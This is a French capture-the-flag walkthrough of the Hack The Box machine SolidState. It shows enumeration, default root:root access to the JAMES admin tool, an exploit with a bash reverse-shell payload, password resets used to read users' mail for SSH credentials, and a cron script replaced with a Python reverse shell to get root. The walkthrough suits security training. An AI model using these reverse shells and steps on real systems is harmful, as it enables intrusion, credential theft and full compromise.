# SolidState `JAMES` `cron` * Nom machine : SolidState * Difficulté : Moyenne * OS : Linux ## Enumération ### NMAP ``` Nmap scan report for 10.10.10.51 Host is up (0.032s latency). Not shown: 65529 closed tcp ports (conn-refused) PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.4p1 Debian 10+deb9u1 (protocol 2.0) | ssh-hostkey: | 2048 77:00:84:f5:78:b9:c7:d3:54:cf:71:2e:0d:52:6d:8b (RSA) | 256 78:b8:3a:f6:60:19:06:91:f5:53:92:1d:3f:48:ed:53 (ECDSA) |_ 256 e4:45:e9:ed:07:4d:73:69:43:5a:12:70:9d:c4:af:76 (ED25519) 25/tcp open smtp JAMES smtpd 2.3.2 |_smtp-commands: solidstate Hello nmap.scanme.org (10.10.14.12 [10.10.14.12]) 80/tcp open http Apache httpd 2.4.25 ((Debian)) |_http-title: Home - Solid State Security |_http-server-header: Apache/2.4.25 (Debian) | http-methods: |_ Supported Methods: POST OPTIONS HEAD GET 110/tcp open pop3 JAMES pop3d 2.3.2 119/tcp open nntp JAMES nntpd (posting ok) 4555/tcp open rsip? | fingerprint-strings: | GenericLines: | JAMES Remote Administration Tool 2.3.2 | Please enter your login and password | Login id: | Password: | Login failed for |_ Login id: ``` ### JAMES Remote Administration Tool 2.3.2 ``` ┌──(kali㉿kali)-[~] └─$ nc -nv 10.10.10.51 4555 (UNKNOWN) [10.10.10.51] 4555 (?) open JAMES Remote Administration Tool 2.3.2 Please enter your login and password Login id: root Password: root Welcome root. HELP for a list of commands ``` root:root fonctionne ## Accès initial {% embed url="" %} ``` ┌──(kali㉿kali)-[~/htb/solid] └─$ python exploit.py 10.10.10.51 10.10.14.12 1234 [+]Payload Selected (see script for more options): /bin/bash -i >& /dev/tcp/10.10.14.12/1234 0>&1 [+]Example netcat listener syntax to use after successful execution: nc -lvnp 1234 [+]Connecting to James Remote Administration Tool... [+]Creating user... [+]Connecting to James SMTP server... [+]Sending payload... [+]Done! Payload will be executed once somebody logs in (i.e. via SSH). [+]Don't forget to start a listener on port 1234 before logging in! ``` Nous l'avons executé et lancer le listeneur qui est en attente. Nous allons retourner sur le port 4555 avec root:root ``` listusers Existing accounts 6 user: james user: ../../../../../../../../etc/bash_completion.d user: thomas user: john user: mindy user: mailadmin setpassword james password Password for james reset setpassword thomas password Password for thomas reset setpassword mindy password Password for mindy reset setpassword mailadmin password Password for mailadmin reset ``` Nous avons listé puis changer les mots de passe utilisateurs. Nous allons voir maintenant si nous pouvons lire des mails avec POP3 ``` ┌──(kali㉿kali)-[~] └─$ telnet 10.10.10.51 110 Trying 10.10.10.51... Connected to 10.10.10.51. Escape character is '^]'. user mindy +OK solidstate POP3 server (JAMES POP3 Server 2.3.2) ready pass password +OK Welcome mindy list +OK 2 1945 1 1109 2 836 retr 2 +OK Message follows Return-Path: Message-ID: <16744123.2.1503422270399.JavaMail.root@solidstate> MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Delivered-To: mindy@localhost Received: from 192.168.11.142 ([192.168.11.142]) by solidstate (JAMES SMTP Server 2.3.2) with SMTP ID 581 for ; Tue, 22 Aug 2017 13:17:28 -0400 (EDT) Date: Tue, 22 Aug 2017 13:17:28 -0400 (EDT) From: mailadmin@localhost Subject: Your Access Dear Mindy, Here are your ssh credentials to access the system. Remember to reset your password after your first login. Your access is restricted at the moment, feel free to ask your supervisor to add any commands you need to your path. username: mindy pass: P@55W0rd1!2@ Respectfully, James ``` ``` ┌──(kali㉿kali)-[~] └─$ ssh mindy@10.10.10.51 mindy@10.10.10.51's password: Linux solidstate 4.9.0-3-686-pae #1 SMP Debian 4.9.30-2+deb9u3 (2017-08-06) i686 The programs included with the Debian GNU/Linux system are free software; the exact distribution terms for each program are described in the individual files in /usr/share/doc/*/copyright. {...} ``` Le shell est restreint, mais nous avons une réponse sur notre listeneur au port 1234. ``` ┌──(kali㉿kali)-[~] └─$ nc -lnvp 1234 listening on [any] 1234 ... connect to [10.10.14.12] from (UNKNOWN) [10.10.10.51] 47986 ${debian_chroot:+($debian_chroot)}mindy@solidstate:~$ id id uid=1001(mindy) gid=1001(mindy) groups=1001(mindy) ``` ## Elévation des privilèges Nous allons télécharger pspy32 sur notre cible, ajouter les droits d'exécution puis le lancer. ``` 2024/11/06 05:45:01 CMD: UID=0 PID=2601 | /usr/sbin/CRON -f 2024/11/06 05:45:01 CMD: UID=0 PID=2602 | /usr/sbin/CRON -f 2024/11/06 05:45:01 CMD: UID=0 PID=2603 | python /opt/tmp.py 2024/11/06 05:45:01 CMD: UID=0 PID=2604 | python /opt/tmp.py 2024/11/06 05:45:01 CMD: UID=0 PID=2605 | sh -c rm -r /tmp/* ``` Nous allons voir ce que contient le fichier tmp.py ``` ${debian_chroot:+($debian_chroot)}mindy@solidstate:/opt$ cat tmp.py cat tmp.py #!/usr/bin/env python import os import sys try: os.system('rm -r /tmp/* ') except: sys.exit() ``` Nous avons les droits d'écritures, nous pouvons donc le remplacer par une reverse shell. ``` ${debian_chroot:+($debian_chroot)}mindy@solidstate:/opt$ cat tmp.py cat tmp.py import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.12",1235));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash") ``` Plus qu'à attendre ... ``` ┌──(kali㉿kali)-[~] └─$ nc -lnvp 1235 listening on [any] 1235 ... connect to [10.10.14.12] from (UNKNOWN) [10.10.10.51] 37304 root@solidstate:~# whoami whoami root ```